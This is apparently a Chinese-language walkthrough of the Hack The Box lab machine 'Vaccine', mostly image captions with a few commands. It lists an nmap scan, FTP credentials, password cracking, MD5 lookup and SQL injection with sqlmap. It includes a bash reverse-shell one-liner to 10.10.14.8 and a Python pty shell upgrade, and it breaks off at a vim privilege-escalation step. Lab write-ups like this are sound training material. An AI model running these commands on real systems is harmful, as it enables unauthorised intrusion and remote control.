文章目录

Vaccine

首先​​nmap -sC -sV 10.10.10.46​

[渗透测试]HTB靶机-Vaccine_python


发现前台是一个登陆界面,尝试ftp登录​​ftpuser / mc@F1l3ZilL4​

[渗透测试]HTB靶机-Vaccine_python_02

输入​​dir​​拿到源码

[渗透测试]HTB靶机-Vaccine_python_03


尝试下载

[渗透测试]HTB靶机-Vaccine_python_04


通过爆破得到密码​​741852963​

[渗透测试]HTB靶机-Vaccine_bash_05


拿到源码

[渗透测试]HTB靶机-Vaccine_python_06


[渗透测试]HTB靶机-Vaccine_bash_07


拿到​​2cb42f8734ea607eefed3b70af13bbd3​​去尝试md5撞库

[渗透测试]HTB靶机-Vaccine_d3_08


成功进入后台

[渗透测试]HTB靶机-Vaccine_python_09


发现存在sql注入

[渗透测试]HTB靶机-Vaccine_bash_10


这里很容易猜测到如果是只通过sql那一定是通过udf提权,直接sqlmap一把梭

[渗透测试]HTB靶机-Vaccine_d3_11


输入​​bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'​​ 反弹shell成功

[渗透测试]HTB靶机-Vaccine_bash_12


继续获取tty shell

SHELL=/bin/bash script -q /dev/null

在​​dashboard.php​​发现了账户密码这个可以查看用户sudo特权指令

[渗透测试]HTB靶机-Vaccine_python_13


目标有python环境,可以直接在获得的shell中直接执行

python3 -c "import pty;pty.spawn('/bin/bash')"

并利用vim中执行shell命令

[渗透测试]HTB靶机-Vaccine_d3_14